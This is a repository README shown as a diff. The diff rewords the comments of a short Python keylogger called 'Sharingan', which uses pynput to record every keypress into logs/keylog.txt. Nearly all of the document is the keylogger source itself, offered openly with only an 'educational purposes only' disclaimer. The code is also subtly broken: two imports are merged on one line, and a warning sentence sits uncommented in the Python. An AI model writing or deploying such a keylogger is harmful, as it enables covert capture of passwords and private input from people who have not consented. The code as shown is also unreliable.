THEkuroix/Sharingan/README.md

 # main.py
-# Sharingan Keylogger - Tool That Monitors Keyboard Inputs
+# Sharingan Keylogger - Keyboard Input Monitoring Tool
-# Warning : This Tool is Only for THEkuroix!
+# Warning: This tool is for educational purposes only.
+Stay within ethical and legal boundaries.

 from pynput.keyboard import Listener import os

-# Folder and file name for the log file
+# Directory and file name for logs
 LOG_DIR = "logs"
 LOG_FILE = "keylog.txt"

-# Creating the log folder
+# Create log directory if it doesn't exist
 if not os.path.exists(LOG_DIR):
     os.makedirs(LOG_DIR)

 log_path = os.path.join(LOG_DIR, LOG_FILE)

-# Writing function to log file
+# Function to write to the log file
 def write_to_file(key):
     with open(log_path, "a") as file:
         file.write(key + "\n")

-# Callback function that runs when keys are pressed
+# Callback function when a key is pressed
 def on_press(key):
     try:
-        # regular characters
+        # Normal characters
         write_to_file(str(key.char))
     except AttributeError:
-        # Özel tuşlar (Shift, Enter, Backspace, vs.)
+        # Special keys (Shift, Enter, Backspace, etc.)
         write_to_file(str(key))

-# Starting the listener
+# Start the listener
 with Listener(on_press=on_press) as listener:
     listener.join()